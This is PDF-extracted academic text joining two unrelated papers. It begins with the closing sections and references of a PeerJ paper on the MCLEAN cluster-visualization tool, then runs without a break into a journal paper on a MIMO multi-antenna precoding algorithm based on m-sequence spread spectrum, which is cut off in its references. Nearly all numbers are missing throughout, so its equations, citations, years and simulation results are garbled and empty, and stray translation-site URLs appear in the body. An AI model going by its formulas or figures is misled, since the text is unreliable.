more useful for particular datasets (especially where the distance matrix does not exhibit gaps). in addition, the current visual encoding of the barcode-tree shows visual artifacts (parallel lines merging with a cluster) depending on the granularity level used. finally, it will be useful to investigate further methods for directly comparing how data elements are integrated across thresholds. in conclusion, incorporating the domain user in the clustering process itself allows for retaining the richness of multilevel patterns in cluster results. mclean facilitates integrating tacit or other user knowledge in clustering result interpretation and exploration, while simplifying the representation of groups especially in the presence of noise or outliers. we argue that the mclean approach provides new opportunities beyond existing techniques for cluster visualization and exploration. acknowledgements the authors wish to thank houda lamqaddam for guidance in the design of the evaluation, and the evaluation participants for valuable feedback. additional information and declarations funding this research was supported by imec strategic funding , iwt sbo accumulate , and ku leuven coe pfv/ / symbiosys. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: imec strategic funding . iwt sbo accumulate: . ku leuven coe pfv/ / symbiosys. competing interests the authors declare there are no competing interests. author contributions • daniel alcaide conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • jan aerts conceived and designed the experiments, analyzed the data, wrote the paper, reviewed drafts of the paper. alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: bitbucket: https://bitbucket.org/vda-lab/mclean. references abello j, van ham f, krishnan n. . ask-graphview: a large scale graph visualization system. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . alcock rj, manolopoulos y. . time-series similarity queries employing a feature- based approach. in: th hellenic conference on informatics. river edge: world scientific publishing, – . archambault d, munzner t, auber d. . grouseflocks: steerable exploration of graph hierarchy space. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . archambault d, munzner t, auber d. . tuggraph: path-preserving hierar- chies for browsing proximity and paths in graphs. in: visualization symposium, . pacificvis’ . ieee pacific. beijing, china: piscataway: ieee, – doi . /pacificvis. . . beale r. . supporting serendipity: using ambient intelligence to augment user exploration for data mining and web browsing. international journal of human- computer studies ( ): – doi . /j.ijhcs. . . . boudjeloud-assala l, pinheiro p, blansché a, tamisier t, otjacques b. . in- teractive and iterative visual clustering. information visualization ( ): – doi . / . bruneau p, otjacques b. . an interactive, example-based, visual clustering system. in: information visualisation (iv), th international conference. london: piscataway: ieee, – doi . /iv. . . chen j, maceachren am, peuquet dj. . constructing overview+ detail dendrogram- matrix views. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . desjardins m, macglashan j, ferraioli j. . interactive visual clustering. in: pro- ceedings of the th international conference on intelligent user interfaces. honolulu, hawaii: new york: acm, – doi . / . . di giacomo e, didimo w, grilli l, liotta g. . graph visualization techniques for web clustering engines. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . duman h, healing a, ghanea-hercock r. . an intelligent agent approach for visual information structure generation. in: intelligent agents, . ia’ . ieee symposium on. nashville: pisacataway: ieee, – doi . /ia. . . eades p, feng q-w. . multilevel visualization of clustered graphs. in: international symposium on graph drawing. springer, – . alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://bitbucket.org/vda-lab/mclean http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /pacificvis. . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . / http://dx.doi.org/ . /iv. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /ia. . http://dx.doi.org/ . /peerj-cs. eades p, huang ml. . navigating clustered graphs using force-directed methods. journal of graph algorithms and applications ( ): – doi . /jgaa. . ester m, kriegel h-p, sander j, xu x. . a density-based algorithm for discovering clusters in large spatial databases with noise. in: kdd’ proceedings of the second international conference on knowledge discovery and data mining. portland, or: palo alto: aaai press, – . fisher r, marshall m. . iris data set. uc irvine machine learning repository. available at http://archive.ics.uci.edu/ml/datasets/iris. friedman j, hastie t, tibshirani r. . the elements of statistical learning. vol. . new york: springer series in statistics new york. jain ak, murty mn, flynn pj. . data clustering: a review. acm computing surveys (csur) ( ): – doi . / . . keim da, mansmann f, thomas j. . visual analytics: how much visualization and how much analytics? acm sigkdd explorations newsletter ( ): – doi . / . . langfelder p, zhang b, horvath s. . defining clusters from a hierarchical clus- ter tree: the dynamic tree cut package for r. bioinformatics ( ): – doi . /bioinformatics/btm . lee h, kihm j, choo j, stasko j, park h. . ivisclustering: an interactive visual document clustering via topic modeling. in: computer graphics forum. vol. . new jersey: wiley online library, – . liu z, navathe sb, stasko jt. . ploceus: modeling, visualizing, and analyzing tabular data as networks. information visualization ( ): – doi . / . looney cg. . interactive clustering and merging with a new fuzzy expected value. pattern recognition ( ): – doi . /s - ( ) - . ng rt, han j. . clarans: a method for clustering objects for spatial data min- ing. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . nielsen cb, younesy h, o’geen h, xu x, jackson ar, milosavljevic a, wang t, costello jf, hirst m, farnham pj, jones sj. . spark: a navigational paradigm for genomic data exploration. genome research ( ): – doi . /gr. . . obulkasim a, meijer ga, van de wiel ma. . semi-supervised adaptive-height snipping of the hierarchical clustering tree. bmc bioinformatics ( ): doi . /s - - - . rinzivillo s, pedreschi d, nanni m, giannotti f, andrienko n, andrienko g. . visually driven analysis of movement data by progressive clustering. information visualization ( – ): – doi . /palgrave.ivs. . rosvall m, bergstrom ct. . maps of random walks on complex networks reveal community structure. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jgaa. http://archive.ics.uci.edu/ml/datasets/iris http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /palgrave.ivs. http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /peerj-cs. sakai r, winand r, verbeiren t, moere av, aerts j. . dendsort: modular leaf ordering methods for dendrogram representations in r. f research : . topaz cm, ziegelmeier l, halverson t. . topological data analysis of biological aggregation models. plos one ( ):e doi . /journal.pone. . vogogias a, kennedy j, archaumbault d, smith va, currant h. . mlcut: exploring multi-level cuts in dendrograms for biological data. in: cagatay t, tao rw, eds. computer graphics and visual computing conference (cgvc) . geneva: eurographics association doi . /cgvc. . alcaide and aerts ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /cgvc. http://dx.doi.org/ . /peerj-cs. paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - multi antenna precoding algorithm based on m spread spectrum sun ruihua college of information engineering north china university of science and technology tangshan, hebei, china e-mail: @ .com an yongli* college of information engineering, north china university of science and technology tangshan, hebei, , china *corresponding author tongxinayl@ .com bai junying college of information engineering north china university of science and technology tangshan, hebei, china e-mail: @ .com abstract—mimo multi antenna technology can increase the capacity and channel utilization of the communication system without increasing the bandwidth, and become the key technology in the new generation of mobile communication system. however, each channel has its own channel parameters, so in the process of signal transmission, the influence of channel parameters should be considered. when the signal is received, it needs to be restored, which leads to the complexity of the receiving signal. therefore, this paper proposes a multi antenna precoding algorithm based on m spread spectrum, precoding before sending signal spread spectrum to simplify the signal receiving equipment, and verify the feasibility of the algorithm through system error rate. keywords-mimo; multi antenna technology; mobile communication; spread spectrum; precoding i. introduction with the rapid popularization of the practical application of wireless communication system, the number of wireless communication users and user service demand have increased exponentially, but the radio spectrum resources which can be used in wireless communication services are extremely limited. the contradiction between the increasing demand of wireless service and the limited radio spectrum resources is becoming more and more prominent. mimo multi antenna technology is a new type of wireless communication technology developed under this background. multi antenna [ ] can effectively improve the channel capacity and is widely used. multi antenna technology can make full use of space resources to achieve multiple and multi harvest. without increasing the spectrum resources and transmitting power of the antenna, it can increase the capacity of the system channel, and has obvious advantages in many technologies. it is regarded as the core technology of the next generation mobile communication. however, the influence of channel parameters on receiver terminals can not be ignored in signal transmission. therefore, a precoding algorithm based on m spread spectrum is proposed, which is pre processed before sending signals. in order to achieve the purpose of simplifying the receiving device. ii. multi antenna mimo system a. multi antenna mimo system model mimo multi antenna technology is a major breakthrough in antenna technology in the field of wireless mobile communication. in theory, it can improve the system capacity and frequency efficiency without increasing the time and frequency. its concept is very simple. it needs a transmitter and a receiver that have multiple antennas to carry out signal transmission simultaneously, so that a wireless mimo system can be formed. figure is a schematic block diagram of the mimo system: figure . mimo system schematic diagram the transmitter mapped the data signal sent by the space- time map to multiple antennas and sent them out. the receiver sent the signals received by all the antennas to the space-time decoding to restore the data signals sent by the transmitting terminal. according to the difference of space- time mapping, mimo technology can be roughly divided into two categories: spatial diversity and spatial multiplexing. spatial diversity refers to the use of multiple transmission antennas to send signals with the same information through different paths, and at the same time, multiple independent fading signals of the same data symbol are obtained at the receiver end, thus obtaining the reliability of the diversity mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , enhancement. for example, in the slow rayleigh fading channel, using a transmitting antenna, the n root receiving antenna sends signals through n different paths. if the fading between antennas is independent, the maximum diversity gain can be n. for transmitter diversity technology, the gain of multiple paths is also used to improve the reliability of the system. in a system with the n root receiving antenna with the m root transmitting antenna, the maximum diversity gain of m*n can be obtained if the path gain between the antenna pairs is an independent uniform distribution of rayleigh fading. at present, the commonly used spatial diversity techniques in mimo systems are space time block code (stbc) and beamforming technology. stbc is an important coding form based on transmit diversity, the most basic of which is the alamouti design for two antennas. the signal model of mimo multi antenna system:                                                            n n n x x x hhh hhh hhh r r r ntntnrntnrnr nt nt nr        the matrix is r hx n  , r is the received signal, h is the channel matrix, x is the transmit signal, and n is the noise signal. the transmitter mapped the data signal sent by the space- time map to multiple antennas and sent them out. the receiver sent the signals received by all the antennas to the space-time decoding to restore the data signals sent by the transmitting terminal. according to the difference of space- time mapping, mimo technology can be roughly divided into two categories: spatial diversity and spatial multiplexing. spatial diversity refers to the use of multiple transmission antennas to send signals with the same information through different paths, and at the same time, multiple independent fading signals of the same data symbol are obtained at the receiver end, thus obtaining the reliability of the diversity enhancement. spatial multiplexing technology uses multiple antennas to transmit independent data at the same time, thus increasing the data capacity of the system. for example, in the slow rayleigh fading channel, using a transmitting antenna, n root receiving antennas sends signals through n different paths. if the fading between antennas is independent, the maximum diversity gain can be n. for transmitter diversity technology, the gain of multiple paths is also used to improve the reliability of the system. in a system with the n root receiving antennas and with the m root transmitting antennas, the maximum diversity gain of m*n can be obtained if the paths gain between the antenna pairs is an independent uniform distribution of rayleigh fading. the diversity technique is mainly used to combat channel fading. conversely, the fading characteristics of mimo channels can provide additional channels to increase the degree of freedom in communication. in essence, if each fading between the transmit and receive antennas is independent, multiple parallel subchannels can be generated. if we transmit different information streams on these parallel sub channels, we can provide transmission data rate, which is called spatial multiplexing. according to the correspondence between sub data stream and antenna, the spatial multiplexing system can be roughly divided into three modes: d-blast, v-blast and t-blast. b. main teachnolody there are three main technologies in mimo system: space multiplexing, transmission diversity and beamforming. ) space reuse: the system divides the data into multiple parts, and the system is transmitted on the multiple antennas at the transmitter. after receiving the mixed signals of multiple data, the parallel data streams are distinguished by the independent fading characteristics between different space channels. it achieves the purpose of obtaining higher data rate in the same frequency resource. ) transmission diversity technology: taking the space time coding as the representative, the data stream is jointly encoded at the transmitter side to reduce the symbol error rate due to channel fading and noise. space time coding increases the redundancy of the signal at the transmitter, so that the diversity gain is obtained at the receiver. at present, the commonly used spatial diversity techniques in mimo systems are space time block code (stbc) and beamforming technology. stbc is an important coding form based on transmit diversity, the most basic of which is the alamouti design for two antennas. ) beamforming: the system generates a directivity beam through multiple antennas, concentrating the signal energy in the direction of the desired transmission, thus improving the quality of the signal and reducing the interference to other users. space reuse can maximize the average transmission rate of mimo system, but only a limited diversity gain can be obtained. it may not be used in high order modulation, such as qam, in the use of snr. wireless signals will be reflected frequently in dense urban areas, indoor coverage and other environments, making the fading characteristics of multiple spatial channels more independent, thus making the effect of space multiplexing more obvious. wireless signals are less in the suburbs and in rural areas, and the correlation between different spatial channels is larger, so space reuse is therefore reused. which effect is much worse. the extra diversity gain and coding gain can be obtained by space-time coding of the transmitted signal, so the high order modulation can be used in the wireless environment with relatively small snr, but the rate bonus of the space parallel channel can not be obtained. space coding technology also performs well in situations where wireless correlation is large. beamforming technology can achieve better signal gain and interference suppression when it can acquire channel state information, so it is more suitable for tdd system. beamforming is not suitable for dense urban areas, indoor coverage and other environments. due to reflection, on the one hand, the receiver receives signals from too many http://fanyi.baidu.com/translate?aldtype= &query=w%e % %a %e % c% f&keyfrom=baidu&smartresult=dict&lang=auto zh#zh/en/javascript:void( ); international journal of advanced network, monitoring and controls volume , no. , paths, which results in a poor phase effect. on the other hand, a large number of multipath signals will lead to the difficulty of doa information estimation. c. the advantages of mimo system model the application of mimo technology makes space a kind of resource that can be used to improve performance, and can increase the coverage of wireless system. ) improving the capacity of the channel the mimo access point can transmit and receive multiple spatial flows between the mimo access point and the client side. the channel capacity can increase linearly with the increase of the number of antennas. therefore, the capacity of the wireless channel can be doubled by using the mimo channel. without increasing the bandwidth and the transmit power of the antenna, the spectrum utilization rate can be doubled. ) improving the reliability of the channel by using the spatial multiplexing gain and spatial diversity gain provided by mimo channel, multiple antennas can be used to suppress channel fading. the application of multi antenna system enables parallel data stream to be transmitted at the same time, which can significantly overcome the channel fading and reduce the bit error rate. d. application ) wireless broadband mobile communication the wireless broadband mobile communication system with mimo technology can be divided into two categories from the multi antenna placement method of the base station. one is that multiple base station antennas are arranged to form an antenna array and are placed in the coverage area. this class can be called a centralized mimo, and the other is that the multiple antennas of the base station are scattered in the coverage area. it is called a distributed mimo. )traditional cellular mobile communication system mimo technology can be applied directly to traditional cellular mobile communication systems, and the single antenna of base stations can be changed into antenna arrays. the base station carries out mimo communication with the mobile station with multiple antennas in the cell through the antenna array. )combining with the traditional distributed antenna system the combination of traditional distributed antenna system and mimo technology can improve the capacity of the system. this new distributed mimo system structure, distributed wireless communication system (dwcs), has become an important research focus of mimo technology. ) the field of wireless communication mimo technology has become one of the key technologies in the field of wireless communication. through the continuous development in recent years, mimo technology will be more and more applied to all kinds of wireless communication systems. )radar field mimo technology is also used in the field of radar. it mainly uses multiple antennas to transmit different orthogonal waveforms, and covers large space at the same time, and uses long time coherent accumulation to obtain high signal to noise ratio. iii. spread spectrum communication a. spread spectrum communication technology the spread spectrum communication technology [ ] is a way of information transmission. the bandwidth of the signal is far greater than the minimum bandwidth required for the information transmitted; the expansion of the frequency band is accomplished by an independent code sequence, implemented by the encoding and modulation methods, and is independent of the information data; the same code is used at the receiver. related synchronous reception, expansion and recovery of transmitted information. the spread spectrum code is used to spread spectrum modulation at the sending end, and the correlation demodulation technology is used to receive the signal at the receiver. spread spectrum communication needs spread spectrum modulation to transmit spread spectrum modulation, and signal reception needs to be extended with the same spread spectrum coding, which provides the basis for frequency multiplexing and multiple access communication. making full use of the correlation characteristics between the spread spectrum codes of different code types, it can be allocated to different users and different spread spectrum codes, which can distinguish different users' signals and do not be disturbed by other users, and the frequency reuse can be realized. spread spectrum signal is obtained by spreading the random sequence pseudo-random code to modulate radio frequency signal or to jump the frequency of carrier signal. therefore, the spread spectrum system is different from the traditional communication system, and it can share the same channel resources to the maximum extent. each system has a different extension sequence to reduce interference from other devices. only recipients with the same extension sequence with the transmitter can restructure or compress the spread spectrum signal to obtain effective loading information. even if a set of spread spectrum devices use the same channel to transmit signals in the same area, they will not interfere with each other if they use different spread spectrum sequences. the advantage of the channel reuse of spread spectrum system makes it the most ideal choice in the crowded environment of big cities. b. spread spectrum principle at the transmitter, the input information is first modulated by the information to form a digital signal, and then the spread spectrum code sequence generated by the spread spectrum code generator is used to modulate the digital signal to broaden the spectrum of the signal. the broadened signal is then modulated to radio frequency. at the receiving end, the received wideband radio frequency signal is converted to the intermediate frequency, and then the local spread spectrum code sequence generated from the same origin is despreading, and then the information is international journal of advanced network, monitoring and controls volume , no. , demodulated into the original information output. figure is a schematic map of spread spectrum technology. figure . principle diagram of spread spectrum ) transmitting terminal i) the information input from the transmitter is modulated by information to form a digital signal. ii) spread spectrum code generated by spread spectrum code generator to expand the spectrum of digital signal. iii) the digital signal of rf generator is converted into analog signal and sent through rf signal. ) receiving terminal i) at the receiving end, the received rf signals are converted from high frequency to intermediate frequency that can be processed by electronic devices, and the analog signals are converted into digital signals. ii) the spread spectrum code generator produces the same spread spectrum code as the sending end to despread the digital signal. iii) demodulating the digital signal into the original information output. c. classification of spread spectrum technology in technical implementation, spread spectrum is usually divided into several methods: direct sequence (ds) spread spectrum, frequency hopping (fh) spread spectrum, time hopping (th) spread spectrum and linear frequency modulation (chirp) spread spectrum. ) direct sequence spread spectrum the spread spectrum sequence with high bit rate is used to expand the spectrum of the signal at the transmitter. at the receiver, the same spread spectrum sequence is used to despread, and the spread spread spectrum signal is restored to original information. ) frequency hopping spread spectrum multiple frequency shift keying is selected by using a sequence of codes. that is to say, the frequency shift keying modulation using the spread spectrum code sequence makes the carrier frequency jump. ) time hopping spread spectrum cause the signal to jump on the time axis. first, the time axis is divided into many time pieces, which is controlled by the sequence of spread spectrum code in one frame. in other words, the time jump can be understood as the time shift keying of the multi time slice selected by a certain code sequence. ) linear frequency hopping the transmitted radio frequency pulse signal is broadened in one cycle, and the spread spectrum modulation method is mainly applied to radar. d. application of spread spectrum communication as a mature high-tech technology, spread spectrum communication can be applied to: ( ) the dilute rural areas and underdeveloped areas of the remote people; ( ) the prosperous downtown area of the saturated wired infrastructure; ( ) new communities with cable infrastructure lagging due to surging business requirements; ( ) user backbone / backup communication network to make up for the shortage of public network of posts and telecommunications. iv. precoding algorithm based on m spread spectrum a. pseudorandom code theory pseudo random code (pseudo random code, pseudo noise code, pn code, pseudo-noise code) is a code with a similar white noise character, also known as a random (pseudo-noise) sequence. the structure can be pre determined, and can be repeatedly generated and copied, with a random sequence of random characteristics. pseudorandom code sequences can be generated by the shift register network. the network consists of a rp cascade dual state device shift pulse generator and a modular two adder. white noise is a random process, the instantaneous value obeys the normal distribution, and the power spectrum is uniform in a wide band. with excellent correlation characteristics, the autocorrelation function of white noise is similar to the delta function. but it can not realize amplification, modulation, detection, synchronization and control. most pseudo random codes are periodic codes, which can be generated and copied artificially, usually generated by binary shift registers. with the nature of white noise, the correlation function has a sharp characteristic, the power spectrum occupies a very wide band, so it is easy to separate from other signals or interference with excellent anti- interference characteristics. in engineering, pseudo-random codes are commonly used to represent pseudo random codes in two yuan domain , , and elements. ( ) in each cycle, the number of elements and elements is approximately equal, and the maximum is only one difference. ( ) within each cycle, the number of element runs of k bit length appears more than twice as many times as the length of k+ bits (the same element of the same r bit that appears continuously) is called the element distance of the length of the r bit). ( ) the autocorrelation function of a sequence is a periodic function and has a dual value property. international journal of advanced network, monitoring and controls volume , no. , ( ) , , ,.... mn r mk mn n              in the formula, n is the cycle of two yuan sequence, also known as code length or length; k is integer less than n;  is symbol delay. pseudo-random codes have the following characteristics: ( ) the pseudo random signal must have sharp autocorrelation function, and the cross-correlation function value should be close to value. ( ) there is enough code cycle to ensure the requirements of anti detection and anti-jamming. ( ) the number of codes is enough to be used as independent addresses to achieve code division multiple access requirements. ( ) it is easy to be produced in engineering. birth, processing, reproduction and control. setting﹛ai﹜ and ﹛bi﹜ is the two code sequence of n,so , n i i n i i a a b b     . cross correlation function:   n ab i i i r a b n        if   abr   , then ai is orthogonal to bi. autocorrelation function:    n a i i i r a a n        ) narrow sense pseudorandom sequence if the length of the code is n, the autocorrelation function of the ﹛ai﹜ sequence is   , , ,... n a i i i mn r a a m n mn n                   ) generalized pseudorandom sequence if the length of the code is n, the autocorrelation function of the ﹛ai﹜sequence is   , , ,... n a i i i mn r a a m mnn                  b. m sequence the m sequence is a pseudo random sequence, pseudo noise (pn) code or pseudo-random code. a sequence that can be determined and can be repeated is called deterministic sequence. a sequence of random sequences that cannot be determined in advance and can not be repeated. sequences that cannot be predefined but can be repeated are called pseudo random sequences. the m sequence is a code sequence whose the cycle is ^ n  generated by a n- linear shift register, which is the abbreviation of the longest linear shift register sequence. for a n level feedback shift register, there can be up to ^n states. for a linear feedback shift register, the full " " state will not be transferred to other states, so the longest period of the sequence of the linear shift register is ^ n  .when the period of the {ai} sequence generated by the n level linear shift register is ^ n  , {ai} is called a n class m sequence. when the feedback function is a nonlinear function, a nonlinear shift register is formed, and its output sequence is nonlinear sequence. the maximum cycle of output sequence can reach ^n, and the nonlinear shift register sequence with the maximum cycle value is called m sequence. generally speaking, in a n level binary shift register generator, the maximum length of code generation cycle is ^ n  . take m= as an example, if its initial state is (a ,a ,a ,a )=( , , , ), then a new input a =  = is generated by a and a mode at the time of shift, and the new state becomes (a ,a ,a ,a ) = ( , , , ) , so that the shift returns to the initial state times, but if the initial state ( , , , ), then, after the shift, the whole state is , which means that the whole state should be avoided in this feedback. there are = different states in the stage. there are kinds of availability except all states, that is, the maximum period of the sequence generated by any level feedback latch is up to , which satisfies the n- . + + + c c cn- an an- a a c = cn= 输出 figure . n class linear feedback latch ai(i= ~n) - the state of the latch. ai= or - feedback state. ci= indicates that the feedback line is disconnected, and ci= means the feedback line is connected. figure shows the composition of a general pure feedback latch. the connection state of the feedback line is expressed in ci, ci= indicates that the line is connected, the ci= is disconnected, and the connection state of the feedback line is different, which may change the period of the latch. international journal of advanced network, monitoring and controls volume , no. , in order to generate m sequences, the characteristic polynomial must be determined to determine the feedback structure of the linear feedback shift register. the characteristic equation of the n class linear shift register is defined as: ( ) n n f x c x c x c x      the original polynomial of the m sequence is as follows: ( ) a x x x   ,figure is a shift register structure diagram. figure . shift register structure diagram the initialization register is [d d d d d ]=[ ], the register first shifts left to see m ( ) = , and then according to the above picture, we can see feedback d =c  c . because of the order register, the code length is n= - = . so cycles are needed to get the required m sequence. the simulation results are as follows: . . . . . . . . . figure . m sequence simulation result diagram c. the properties of m sequence ) equilibrium in a period of m sequence, the number of symbols " " and " " are roughly equal, " " appears n- - times, and " " appears n- times (" " more than " "). ) run length distribution run length refers to the same element in the sequence. and the number of this element is called the length of the travel. ) shift additive properties a m sequence mp is added to a different sequence of mr ,generated by any delay shift, modules and is still a mz of a delay shift sequence of mp, that is, mp  mr=mz. now, the m sequence of a m= is now taken as an example, one period of mp is set to , and the other sequence mr is the result that mp moves to the right one time, that is, a corresponding period of mr is , the two sequence modules and the corresponding period of the  = upper form for mz, which is the same as the result of the mp shift to the right times. ) autocorrelation characteristics autocorrelation and cross correlation: a m sequence and its shifted sequence are bit by bit, the sequence obtained is also a m sequence, but the phase is different. the m sequence for different phases in the m sequence generator. when the period p is large and the r module is p , the two sequences are almost orthogonal. , ( ) , , , , j r j j m m          ) periodicity as the m sequence has periodicity, its autocorrelation function is also cyclical, and the period is m, namely ( ) ( )r j r j km  , when , , ,j km k   -m - r(j) /m m i figure . periodic schematic diagram of m sequence the maximum length of the m sequence depends on the progression of the shift register, and the structure of the code depends on the location and quantity of the feedback. different tapped combinations produce code sequences of different lengths and structures, and some tap combinations fail to produce the longest cycle sequences. a great deal of research has been done on what kind of length and sequence of code can be produced by tap. the connection diagram of the level m sequence generator and the structure of the generated m sequence have been obtained. ) power spectral density power spectral density and autocorrelation coefficient constitute a pair of fu liye transform. find out as follows: sin( / ) ( ) ( ) / n m t m n r m t m t m                          international journal of advanced network, monitoring and controls volume , no. , because when m is large, the equilibrium of the m sequence, the range distribution, the autocorrelation and the power spectrum density are all similar to the white noise, but it has the regularity and can be repeated, so the m sequence belongs to a pseudo noise sequence. d. application of m sequence and its significance ) application in communication encryption the autocorrelation of m sequence is good, it is easy to produce and copy, and has pseudo randomness. using m sequence to encrypt the digital signal, the encrypted signal has the characteristic of pseudo noise while carrying the original signal, so as to achieve the purpose of hiding information in the process of signal transmission; at the receiver, the m sequence is used again to decrypt and restore the original signal. ) the application of the radar signal design in recent years, the signal used in the spread spectrum radar is a pseudo random sequence with a modulated noise character. it has a high distance resolution and velocity resolution. the receiver of this radar works by means of correlation demodulation. it can work at low snr and has strong anti-interference capability. the radar is a kind of continuous wave radar, which has low probability of interception. it is a kind of new radar, high performance and suitable for modern high-tech war. the radar system using pseudo-random sequences as launching signals has many outstanding advantages. first, it is a continuous wave radar, which can make good use of transmitter power. secondly, in a certain signal to noise ratio, it can achieve a good measurement accuracy and guarantee the single value of the measurement, which has a higher distance resolution and velocity resolution than the monopulse radar. finally, it has strong anti-jamming ability, and the enemy will interfere with this wideband radar signal, which will be much more difficult than interfering with ordinary radar signals. ) application in communication system pseudo random sequence is a seemingly random, actually regular periodic binary sequence, which has the properties similar to noise sequence. in cdma, the address code is selected from pseudo random sequence, and a pseudo random sequence is used most easily in cdma; m sequence is used to distinguish different users from different phases of the m sequence. for data security, a data mask (data disruption) technique is used in the paging channel and forward service channel of the cdma, which is used to scramble the traffic channel with the m sequence of the length of  , which is performed on the modulation characters output by the packet interleaver. through the interleaver output character and the long code pn chip, the binary mode addition is completed. e. precoding algorithm based on m spread spectrum on the basis of the original spread spectrum technology, the algorithm proposed a new technology. the general signal must have the matrix parameters of the channel itself during a certain channel during the transmission and reception. in this way, the reduction of the signal is difficult when receiving the signal at the receiving end. in other words, in real life, the general signal sending and receiving may make the device of the receiver complex. in order to simplify the receiving device, the inverse matrix of the channel is multiplied before the signal is sent, so that the purpose is achieved within a certain range of bit error rate. the design steps are as follows: step ( ): the data flow of the first user is   { } k b ,   { } k b and }{ )( b k . the base station transmitter encodes the data of three channels to get coded signals   k s ,   k s and   k s :  gbs gbs gbs kk kk kk )( )( )( )( )( )(     among them, g , g and g are generating matrices. the three spatial channel of user k uses three different encoding. g , g , and g corresponding check matrices are h , h and h ; step ): the coding signals   k s ,   k s and   k s of the k user are modulated by the channel matrix.                                                          )( )( )( k k k kkk kkk kkk k k k hhh hhh hhh s s s z z z  among them,  ( ) , , , , kijh i j  is the attenuation coefficient of the base station transmitter antenna i to the k mobile receiver antenna j through the independent rayleigh path. and the baseband modulation signals of the k users,   k z ,   k z and   k z , kk ,,  are obtained. step ): the base band transmitter modulates the baseband modulation signals   k z ,   k z and   k z , kk ,,  , and obtains the signal   ( ) k t z ,   ( ) k t z and   ( ) k t z based on the m spread spectrum precoding, and then the three antennas are transmitted respectively. step ): the k mobile receiver uses the local despreading circuit to extract the baseband encoded signals   k y ,   k y and   k y . international journal of advanced network, monitoring and controls volume , no. ,                                                                n n n k k k )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( z z z hhh hhh hhh y y y rt rt rt k k k t k k k k k k kkk kkk kkk  in formula ,   k n is the baseband noise vector for the first antenna’s channel of the k mobile station receiver,   k n is the baseband noise vector for the second antenna’s channel of the k mobile station receiver,   k n is the baseband noise vector for the third antenna’s channel of the k mobile station receiver , ( ) ( ) k t r  , ( ) ( ) k t r  and ( ) ( ) k t r  are the representations of despreading. step ): the k receiver uses a local decoder to decode the received baseband signals   k y ,   k y and   k y , and extracts the data streams of the base station to transmit data streams ( ) k b , ( ) k b and ( ) k b , with ( ) ( ) k k b h  , ( ) ( ) k k b h  and ( ) ( ) k k b h  without error. v. simulation analysis taking the * antenna system as an example, a binary original signal with a sequence length of is sent as shown in figure . before sending the signal, a binary signal with a spread spectrum growth of is spread out with a precoding algorithm based on m spread spectrum, and the binary signal processed by the algorithm is shown as shown in figure . after the receiver despreading. it is found that the original signal and the received signal have some error. therefore, the different antenna systems using the algorithm, the error rate simulation under the same signal to noise ratio, and under the same antenna system, the algorithm is applied to simulate the error rate of the algorithm without using the algorithm. . . . . . . . . . original sequence figure . original signal . . . . . . . . . receiving sequence figure . the signal received by this algorithm the error rate simulation is carried out with different antenna systems. the results are shown in figure . the bit error rate increases with the increase of the number of antennas at the same signal to noise ratio, but the bit error rate tends to be stable with the increase of signal to noise ratio. with the increase of the signal to noise ratio, the bit error rate decreases. for the same antenna system, the ber of the antenna system adopting the algorithm is significantly lower than that of the antenna system without the same signal to noise ratio. - . - . - . - . - . - . snr(db) e rr o r ra te * antenna system uses this algorithm * antenna system does not use this algorithm * antenna system uses this algorithm figure . error rate simulation diagram it can be concluded that the algorithm can be used to simplify the receiving device of the receiver to a certain extent. but in practical applications, the interference of various signals in the channel also affects the signal of the receiver, so the algorithm needs to be improved so as to adapt to various channels. vi. conclusion and prospect with the rapid development of science and technology, the demand for wireless service is not only the improvement of information rate, but also the high quality of receiving information. the space reuse and diversity technology of http://fanyi.baidu.com/#zh/en/javascript:void( ); international journal of advanced network, monitoring and controls volume , no. , mimo multi antenna communication system can effectively transmit and receive multiple data streams at the same time and in the same frequency band. reasonable use of spatial multiplexing and diversity technology can not only improve information rate, but also improve system performance. it can greatly improve the spectrum utilization of communication systems and meet the high rate of users' communication needs. therefore, it has received extensive attention and research at home and abroad. it has become one of the most promising technologies in the g mobile communication system. in the actual production and life, sometimes too many complex equipment will affect the results and feasibility of the experiment, so we should also pay attention to the study of the technology, and we should also pay attention to the simplification of the equipment without affecting the experimental results. the purpose of this project is to bring forward a new principle based on the original spread spectrum, according to the theoretical knowledge, so that the equipment can be simplified. in this way, a higher effect will be achieved in the application of the g mimo system. however, due to the interference of all kinds of noise in the signal transmission, it will have a certain influence on the receiving signal. therefore, the algorithm can be improved from the direction of interference coordination to reduce the impact of interference on the received signal. acknowledgements this project is supported by ‘the excellent going abroad experts’ training program in hebei province, doctoral research fund of north china university of science and technology, national science and technology support program (no. bah b ), hebei natural science foundation of china: (no. f ). references [ ] guo wenzhuo. research on key technologies of multi antenna multiuser communication system [d]. harbin: harbin engineering university, . [ ] zhang fenghua, li wangqing. application and development of spread spectrum communication technology [n]. xinjiang science and technology daily (han), . [ 